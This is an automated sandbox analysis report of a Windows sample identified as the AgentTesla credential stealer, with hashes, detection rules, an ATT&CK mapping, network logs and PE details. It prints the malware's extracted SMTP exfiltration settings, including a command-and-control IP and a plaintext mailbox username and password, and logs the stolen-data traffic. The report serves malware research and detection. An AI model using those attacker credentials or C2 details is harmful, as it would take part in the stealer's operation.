Windows
Analysis Report
D6yz87XjgM.exe
Overview
General Information
Sample name: | D6yz87XjgM.exe (renamed because original name is a hash value) |
Original sample name: | 6e8d235ee046154127d1d33c423c132896d2a19f2b1d68fd33333cffb964b9be.exe |
Analysis ID: | 1549405 |
MD5: | eb180d9ac3c0ee0feb1b997ef3908f36 |
SHA1: | 17dcf2886e1dce74561ac12b4374b7d441f399b8 |
SHA256: | 6e8d235ee046154127d1d33c423c132896d2a19f2b1d68fd33333cffb964b9be |
Tags: | exe, user-adrian__luca |
Infos: | |
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- D6yz87XjgM.exe (PID: 7748 cmdline: "C:\Users\user\Desktop\D6yz87XjgM.exe" MD5: EB180D9AC3C0EE0FEB1B997EF3908F36)
  - RegAsm.exe (PID: 7896 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  - RegAsm.exe (PID: 7908 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
- cleanup
Name | Description |
---|---|
Agent Tesla, AgentTesla | A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel. |
{"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxsenses@vetrys.shop", "Password": "M992uew1mw6Z"}
Rule | Description | Author |
---|---|---|
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
Rule | Description | Author |
---|---|---|
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
19 entries in total; first 5 shown.
Rule | Description | Author |
---|---|---|
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen |
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
19 entries in total; first 5 shown.
Networking |
---|
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-11-05T16:05:16.773977+0100 | 2022930 | 1 | A Network Trojan was detected | 4.245.163.56 | 443 | 192.168.2.7 | 49741 | TCP |
2024-11-05T16:06:01.795556+0100 | 2022930 | 1 | A Network Trojan was detected | 4.245.163.56 | 443 | 192.168.2.7 | 55627 | TCP |
2024-11-05T16:06:46.896832+0100 | 2030171 | 1 | A Network Trojan was detected | 192.168.2.7 | 49706 | 162.254.34.31 | 587 | TCP |
AV Detection |
---|
Source: | Avira: |
Source: | Malware Configuration Extractor: |
Source: | ReversingLabs: |
Source: | Integrated Neural Analysis Model: |
Source: | Static PE information: |
Source: | HTTPS traffic detected: |
Networking |
---|
Source: | Suricata IDS: |
Source: | TCP traffic: |
Source: | IP Address: | 3 entries |
Source: | ASN Name: |
Source: | JA3 fingerprint: |
Source: | DNS query: | 2 entries |
Source: | Suricata IDS: | 2 entries |
Source: | TCP traffic: |
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | 19 entries |
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | 18 entries |
Source: | Network traffic detected: | 2 entries |
Source: | HTTPS traffic detected: |
Key, Mouse, Clipboard, Microphone and Screen Capturing |
---|
Source: | .Net Code: | 3 entries |
System Summary |
---|
Source: | Matched rule: | 8 entries |
Source: | Code function: | 4_2_0054A57F, 4_2_02272B06, 4_2_02272AF7, 4_2_02272B02, 8_2_00444061, 8_2_00444095, 8_2_00441149, 8_2_004442FC, 8_2_00443A8E, 8_2_00441710, 8_2_004413F9, 8_2_004444A7, 8_2_00441A74, 8_2_00441A33, 8_2_00441ADC, 8_2_0044172A, 8_2_004443EB |
Source: | Code function: | 8_2_02EA4AA0, 8_2_02EAAA32, 8_2_02EADBE0, 8_2_02EA3E88, 8_2_02EA41D0, 8_2_068C45C0, 8_2_068C5D50, 8_2_068C3560, 8_2_068CE0D9, 8_2_068C1018, 8_2_068C91F8, 8_2_068CA150, 8_2_068C5670, 8_2_068C3CAB, 8_2_068C02F8, 8_2_068CC370, 8_2_06A1A198, 8_2_02EADF88 |
Source: | Static PE information: |
Source: | Binary or memory string: | 9 entries |
Source: | Static PE information: |
Source: | Matched rule: | 8 entries |
Source: | Cryptographic APIs: | 8 entries |
Source: | Classification label: |
Source: | File created: |
Source: | Mutant created: |
Source: | Static PE information: |
Source: | WMI Queries: | 2 entries |
Source: | File read: |
Source: | Key opened: |
Source: | ReversingLabs: |
Source: | Process created: | 5 entries |
Source: | Section loaded: | 68 entries |
Source: | Key value queried: |
Source: | Key opened: |
Source: | Static PE information: |
Source: | Static file information: |
Source: | Static PE information: |
Source: | Static PE information: |
Source: | Code function: | 4_2_00408115, 4_2_02270330, 4_2_0227141A, 4_2_022758A7, 8_2_00442788, 8_2_00442F02, 8_2_02EA0C7A, 8_2_02EA0C52, 8_2_06A1FAF4 |
Source: | Process information set: | 80 entries |
Malware Analysis System Evasion |
---|
Source: | WMI Queries: |
Source: | Memory allocated: | 3 entries |
Source: | Thread delayed: | 2 entries |
Source: | Window / User API: | 2 entries |
Source: | Thread sleep count / Thread sleep time: | 33 entries (3 sleep count, 30 sleep time) |
Source: | WMI Queries: |
Source: | WMI Queries: | 2 entries |
Source: | Thread delayed: | 29 entries |
Source: | Binary or memory string: |
Source: | Process information queried: |
Source: | Code function: | 4_2_0054A84C, 4_2_0054A860, 4_2_0054AB35, 4_2_0054A7DA, 4_2_02272B06, 4_2_02276A17, 4_2_02276F4D, 4_2_02276C57, 4_2_022730D7, 4_2_022768DC, 4_2_0227690D, 4_2_02276965, 8_2_00443846, 8_2_004438F8, 8_2_0044388F, 8_2_0044448A, 8_2_004438AB, 8_2_00443D84, 8_2_00443E2E, 8_2_00443AE6, 8_2_00443B38, 8_2_004437EE, 8_2_004437BD |
Source: | Process token adjusted: |
Source: | Memory allocated: |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Section loaded: |
Source: | Section unmapped: | 2 entries |
Source: | Memory written: | 2 entries |
Source: | Process created: | 2 entries |
Source: | Queries volume information: | 6 entries |
Source: | Key value queried: |
Stealing of Sensitive Information |
---|
Source: | File source: | 22 entries |
Source: | Key opened: |
Source: | File opened: | 5 entries |
Source: | File opened: |
Source: | File opened: | 2 entries |
Source: | Key opened: | 2 entries |
Source: | File source: | 19 entries |
Remote Access Functionality |
---|
Source: | File source: | 22 entries |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Shared Modules | Boot or Logon Initialization Scripts | 311 Process Injection | 1 Deobfuscate/Decode Files or Information | 1 Input Capture | 24 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Obfuscated Files or Information | 1 Credentials in Registry | 111 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 1 Process Discovery | Distributed Component Object Model | 1 Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Masquerading | LSA Secrets | 141 Virtualization/Sandbox Evasion | SSH | Keylogging | 23 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 141 Virtualization/Sandbox Evasion | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 311 Process Injection | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
Detection | Scanner | Label |
---|---|---|
37% | ReversingLabs | Win32.Trojan.Midie |
100% | Avira | TR/AD.GenSteal.zobjr |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
api.ipify.org | 172.67.74.152 | true | false | | high |
Malicious | Reputation |
---|---|
false | high |
Malicious | Reputation |
---|---|
false | high |
false | high |
false | high |
false | high |
false | high |
false | high |
false | high |
false | high |
false | high |
false | high |
IP | Domain | Country | ASN | ASN Name | Malicious |
---|---|---|---|---|---|
162.254.34.31 | unknown | United States | 64200 | VIVIDHOSTINGUS | true |
172.67.74.152 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false |
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1549405 |
Start date and time: | 2024-11-05 16:03:59 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 49s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 13 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: | |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | D6yz87XjgM.exe (renamed because original name is a hash value) |
Original Sample Name: | 6e8d235ee046154127d1d33c423c132896d2a19f2b1d68fd33333cffb964b9be.exe |
Detection: | MAL |
Classification: | mal100.spre.troj.spyw.evad.winEXE@5/1@1/2 |
EGA Information: | |
HCA Information: | |
Cookbook Comments: | |
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
- Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
- Not all processes were analyzed; report is missing behavior information
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
- VT rate limit hit for: D6yz87XjgM.exe
Time | Type | Description |
---|---|---|
10:05:05 | API Interceptor |
Match | Detection | Threat Name |
---|---|---|
162.254.34.31 | malicious | AgentTesla |
162.254.34.31 | malicious | AgentTesla |
162.254.34.31 | malicious | AgentTesla |
162.254.34.31 | malicious | AgentTesla |
162.254.34.31 | malicious | AgentTesla |
162.254.34.31 | malicious | AgentTesla |
162.254.34.31 | malicious | AgentTesla |
162.254.34.31 | malicious | AgentTesla |
162.254.34.31 | malicious | AgentTesla |
162.254.34.31 | malicious | AgentTesla |
172.67.74.152 | malicious | Unknown |
172.67.74.152 | malicious | Unknown |
172.67.74.152 | malicious | RDPWrap Tool |
172.67.74.152 | malicious | Unknown |
172.67.74.152 | malicious | Xmrig |
172.67.74.152 | malicious | Xmrig |
172.67.74.152 | malicious | Unknown |
172.67.74.152 | malicious | Unknown |
172.67.74.152 | malicious | LummaC, PrivateLoader, Stealc, Vidar |
172.67.74.152 | malicious | RDPWrap Tool |
Match | Detection | Threat Name |
---|---|---|
api.ipify.org | malicious | AgentTesla, GuLoader |
api.ipify.org | malicious | AgentTesla, GuLoader |
api.ipify.org | malicious | AgentTesla, PureLog Stealer |
api.ipify.org | malicious | Unknown |
api.ipify.org | malicious | Targeted Ransomware |
api.ipify.org | malicious | AgentTesla, GuLoader |
api.ipify.org | malicious | AgentTesla |
api.ipify.org | malicious | Unknown |
api.ipify.org | malicious | AgentTesla, GuLoader |
api.ipify.org | malicious | AgentTesla |
Match | Detection | Threat Name |
---|---|---|
VIVIDHOSTINGUS | malicious | Unknown |
VIVIDHOSTINGUS | malicious | AgentTesla |
VIVIDHOSTINGUS | malicious | AgentTesla |
VIVIDHOSTINGUS | malicious | Unknown |
VIVIDHOSTINGUS | malicious | Mirai |
VIVIDHOSTINGUS | malicious | Mirai |
VIVIDHOSTINGUS | malicious | AgentTesla |
VIVIDHOSTINGUS | malicious | AgentTesla |
VIVIDHOSTINGUS | malicious | AgentTesla |
VIVIDHOSTINGUS | malicious | FormBook |
CLOUDFLARENETUS | malicious | Unknown |
CLOUDFLARENETUS | malicious | AgentTesla, GuLoader |
CLOUDFLARENETUS | malicious | LummaC |
CLOUDFLARENETUS | malicious | HTMLPhisher |
CLOUDFLARENETUS | malicious | FormBook |
CLOUDFLARENETUS | malicious | HTMLPhisher |
CLOUDFLARENETUS | malicious | Unknown |
CLOUDFLARENETUS | malicious | LummaC |
CLOUDFLARENETUS | malicious | Unknown |
CLOUDFLARENETUS | malicious | Amadey, LummaC Stealer, XWorm |
Match | Detection | Threat Name |
---|---|---|
3b5074b1b5d032e5620f69f9f700ff0e | malicious | Unknown |
3b5074b1b5d032e5620f69f9f700ff0e | malicious | AgentTesla, GuLoader |
3b5074b1b5d032e5620f69f9f700ff0e | malicious | HTMLPhisher |
3b5074b1b5d032e5620f69f9f700ff0e | malicious | LummaC |
3b5074b1b5d032e5620f69f9f700ff0e | malicious | Snake Keylogger, VIP Keylogger |
3b5074b1b5d032e5620f69f9f700ff0e | malicious | AgentTesla, GuLoader |
3b5074b1b5d032e5620f69f9f700ff0e | malicious | Snake Keylogger |
3b5074b1b5d032e5620f69f9f700ff0e | malicious | AgentTesla, PureLog Stealer |
3b5074b1b5d032e5620f69f9f700ff0e | malicious | LummaC, XWorm |
3b5074b1b5d032e5620f69f9f700ff0e | malicious | Snake Keylogger, VIP Keylogger |
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\eb42b1a5c308fc11edf1ddbdd25c8486_9e146be9-c76a-4720-bcdb-53011b87bd06
Process: | C:\Users\user\Desktop\D6yz87XjgM.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 50 |
Entropy (8bit): | 1.5212424590621707 |
Encrypted: | false |
SSDEEP: | 3:/lvlp:p |
MD5: | C851BF93667BDD6310D56581D955C2AE |
SHA1: | 8FC5AEC1542BD7471BF815632863622EFE23A834 |
SHA-256: | 3C1A3E1EF8840689F0C6EC14E22435FC79EBC3F8771B7CD230F784CC81AE431D |
SHA-512: | D3D597D36DE0EE75AA44F4F8571E56DAD810E7E6C9839F5D5E6BB05846AB6E61FAF1E9530333BD6EC5AB04098AAE935A522DBD149D214A5971A7368E18C3C9B4 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
File type: | |
Entropy (8bit): | 6.4541856796164225 |
TrID: | |
File name: | D6yz87XjgM.exe |
File size: | 1'653'512 bytes |
MD5: | eb180d9ac3c0ee0feb1b997ef3908f36 |
SHA1: | 17dcf2886e1dce74561ac12b4374b7d441f399b8 |
SHA256: | 6e8d235ee046154127d1d33c423c132896d2a19f2b1d68fd33333cffb964b9be |
SHA512: | 7afb7b99b23754e8edbee1d1ef2fad3191aac17e49eded473c3fe1a806607721717549bb7ffc131c6ab670c83bc8149a76de392b94d8d55cccb6c9296ab19f8c |
SSDEEP: | 49152:LbdYAm4zrbdYAm4zobdYAm4zvbdYAm4zdbdYAm4zZbdYAm4zgjT:Xdr3drCdrzdrddrRdrgX |
TLSH: | F1759D43724C57ADDAA30B31F63FC0A413259EBF56144B1B32CBFB2D19BA15B492A2C5 |
File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...eg.g..........................................@..........................@......h...................................... |
Icon Hash: | 6ced8d96b2ace4b2 |
Entrypoint: | 0x57c3ae |
Entrypoint Section: | .text |
Digitally signed: | true |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
DLL Characteristics: | |
Time Stamp: | 0x67076765 [Thu Oct 10 05:34:29 2024 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 4 |
OS Version Minor: | 0 |
File Version Major: | 4 |
File Version Minor: | 0 |
Subsystem Version Major: | 4 |
Subsystem Version Minor: | 0 |
Import Hash: | e0e5cba487d80ef75c8cfd3e40cc6131 |
Signature Valid: | false |
Signature Issuer: | CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE |
Signature Validation Error: | The digital signature of the object did not verify |
Error Number: | -2146869232 |
Not Before, Not After |
Subject Chain |
Version: | 3 |
Thumbprint MD5: | D26432F60E2A3BBEB3537B78CB826828 |
Thumbprint SHA-1: | 71AB79E1C8FF155838C37A5299AE215C52BF6D1D |
Thumbprint SHA-256: | BCB22974DD56BFE9A9197D05C2D4B646F5BDF23B8BA2ACB8FD9DB1557245A407 |
Serial: | 7AE2B5021371F092A904B6FA |
Instruction |
---|
jmp 00007FCDA4BD6A6Eh |
add byte ptr [ebp-75h], dl |
in al, dx |
push ecx |
push ecx |
push 00401006h |
mov eax, dword ptr fs:[00000000h] |
push eax |
mov dword ptr fs:[00000000h], esp |
push 00000014h |
pop eax |
call 00007FCDA4BD6781h |
push ebx |
push esi |
push edi |
mov dword ptr [ebp-08h], esp |
mov dword ptr [ebp-04h], 0057E490h |
call 00007FCDA4D1FCEEh |
push 0057C3F7h |
jmp 00007FCDA4D51B5Bh |
lea ecx, dword ptr [ebp-20h] |
call 00007FCDA4BD696Ah |
ret |
ret |
lea esi, dword ptr [ebp-20h] |
mov edi, dword ptr [ebp+08h] |
movsd |
movsd |
movsd |
movsd |
mov eax, dword ptr [ebp+08h] |
mov ecx, dword ptr [ebp-10h] |
mov dword ptr fs:[00000000h], ecx |
pop edi |
pop esi |
pop ebx |
leave |
retn 0004h |
push ebp |
mov ebp, esp |
push ecx |
push ecx |
push 00401006h |
mov eax, dword ptr fs:[00000000h] |
push eax |
mov dword ptr fs:[00000000h], esp |
push 00000018h |
pop eax |
call 00007FCDA4BD6720h |
push ebx |
push esi |
push edi |
mov dword ptr [ebp-08h], esp |
mov dword ptr [ebp-04h], 0057E4A0h |
mov dword ptr [ebp-24h], 00000030h |
push 00000004h |
lea eax, dword ptr [ebp-24h] |
push eax |
push 00000022h |
push FFFFFFFFh |
call 00007FCDA4BE001Dh |
call 00007FCDA4BD685Ah |
push 0057C46Eh |
jmp 00007FCDA4D51B5Bh |
lea ecx, dword ptr [ebp-20h] |
call 00007FCDA4BD68F3h |
ret |
ret |
lea esi, dword ptr [ebp-20h] |
mov edi, dword ptr [ebp+08h] |
movsd |
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x17e51c | 0x3c | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x183000 | 0x10b18 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x191000 | 0x2b08 | .rsrc |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x17e000 | 0x1e4 | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x17c714 | 0x17d000 | 8255470300e1a49d0f64e4d18447a703 | False | 0.6001585312089895 | data | 6.503870538873717 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.rdata | 0x17e000 | 0xd04 | 0x1000 | 8b49f51d5aecf86a97629e56d1bce9ae | False | 0.324462890625 | data | 4.396409590241252 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0x17f000 | 0x3d24 | 0x1000 | 620f0b67a91f7f74151bc5be745b7110 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.rsrc | 0x183000 | 0x10b18 | 0x11000 | b438a85e6b16962e124be0333a78acd7 | False | 0.08263442095588236 | data | 3.7430046353398554 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
---|---|---|---|---|---|---|
RT_ICON | 0x1830e8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 34556 x 34556 px/m | | | 0.07952797823258015 |
RT_GROUP_ICON | 0x193910 | 0x14 | data | | | 1.15 |
RT_VERSION | 0x193924 | 0x1f4 | data | German | Germany | 0.5 |
DLL | Import |
---|---|
KERNEL32.DLL | GetProcAddress, VirtualAlloc, GetModuleHandleW |
MSVBVM60.DLL | __vbaVarSub, __vbaStrI2, _CIcos, _adj_fptan, __vbaVarMove, __vbaVarVargNofree, __vbaFreeVar, __vbaLineInputStr, __vbaStrVarMove, __vbaLenBstr, __vbaFreeVarList, _adj_fdiv_m64, __vbaNextEachVar, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryVar, __vbaAryDestruct, __vbaExitProc, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaRefVarAry, __vbaBoolVarNull, _CIsin, __vbaErase, __vbaVargVarMove, __vbaVarZero, __vbaVarCmpGt, __vbaChkstk, __vbaFileClose, EVENT_SINK_AddRef, __vbaStrCmp, __vbaVarTstEq, DllFunctionCall, __vbaVarOr, __vbaRedimPreserve, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, __vbaNew, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, __vbaStrToUnicode, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, __vbaUbound, __vbaVarCat, _CIlog, __vbaFileOpen, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaI4Var, __vbaAryLock, __vbaVarAdd, __vbaVarDup, __vbaStrToAnsi, __vbaVarLateMemCallLd, __vbaVarCopy, _CIatan, __vbaStrMove, __vbaCastObj, __vbaAryCopy, __vbaStrVarCopy, __vbaForEachVar, _allmul, _CItan, __vbaAryUnlock, _CIexp, __vbaFreeObj, __vbaFreeStr |
Language of compilation system | Country where language is spoken |
---|---|
German | Germany |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-11-05T16:05:16.773977+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.245.163.56 | 443 | 192.168.2.7 | 49741 | TCP |
2024-11-05T16:06:01.795556+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.245.163.56 | 443 | 192.168.2.7 | 55627 | TCP |
2024-11-05T16:06:46.896832+0100 | 2030171 | ET MALWARE AgentTesla Exfil Via SMTP | 1 | 192.168.2.7 | 49706 | 162.254.34.31 | 587 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Nov 5, 2024 16:05:04.720576048 CET | 49704 | 443 | 192.168.2.7 | 172.67.74.152 |
Nov 5, 2024 16:05:04.720626116 CET | 443 | 49704 | 172.67.74.152 | 192.168.2.7 |
Nov 5, 2024 16:05:04.720705986 CET | 49704 | 443 | 192.168.2.7 | 172.67.74.152 |
Nov 5, 2024 16:05:04.764120102 CET | 49704 | 443 | 192.168.2.7 | 172.67.74.152 |
Nov 5, 2024 16:05:04.764157057 CET | 443 | 49704 | 172.67.74.152 | 192.168.2.7 |
Nov 5, 2024 16:05:05.373469114 CET | 443 | 49704 | 172.67.74.152 | 192.168.2.7 |
Nov 5, 2024 16:05:05.373564959 CET | 49704 | 443 | 192.168.2.7 | 172.67.74.152 |
Nov 5, 2024 16:05:05.379415035 CET | 49704 | 443 | 192.168.2.7 | 172.67.74.152 |
Nov 5, 2024 16:05:05.379445076 CET | 443 | 49704 | 172.67.74.152 | 192.168.2.7 |
Nov 5, 2024 16:05:05.379707098 CET | 443 | 49704 | 172.67.74.152 | 192.168.2.7 |
Nov 5, 2024 16:05:05.484930992 CET | 49704 | 443 | 192.168.2.7 | 172.67.74.152 |
Nov 5, 2024 16:05:05.531333923 CET | 443 | 49704 | 172.67.74.152 | 192.168.2.7 |
Nov 5, 2024 16:05:05.681911945 CET | 443 | 49704 | 172.67.74.152 | 192.168.2.7 |
Nov 5, 2024 16:05:05.681977034 CET | 443 | 49704 | 172.67.74.152 | 192.168.2.7 |
Nov 5, 2024 16:05:05.682143927 CET | 49704 | 443 | 192.168.2.7 | 172.67.74.152 |
Nov 5, 2024 16:05:05.734992027 CET | 49704 | 443 | 192.168.2.7 | 172.67.74.152 |
Nov 5, 2024 16:05:06.651954889 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 |
Nov 5, 2024 16:05:06.657038927 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:05:06.657151937 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 |
Nov 5, 2024 16:05:07.448519945 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:05:07.449330091 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 |
Nov 5, 2024 16:05:07.454313993 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:05:07.610507965 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:05:07.611438990 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 |
Nov 5, 2024 16:05:07.616348982 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:05:07.773389101 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:05:07.774463892 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 |
Nov 5, 2024 16:05:07.779706955 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:05:07.942066908 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:05:07.942506075 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 |
Nov 5, 2024 16:05:07.947351933 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:05:08.103552103 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:05:08.103756905 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 |
Nov 5, 2024 16:05:08.109263897 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:05:09.244976044 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:05:09.245137930 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 |
Nov 5, 2024 16:05:09.245445967 CET | 587 | 49706 | 162.254.34.31 | 192.168.2.7 |
Nov 5, 2024 16:05:09.245486021 CET | 49706 | 587 | 192.168.2.7 | 162.254.34.31 |
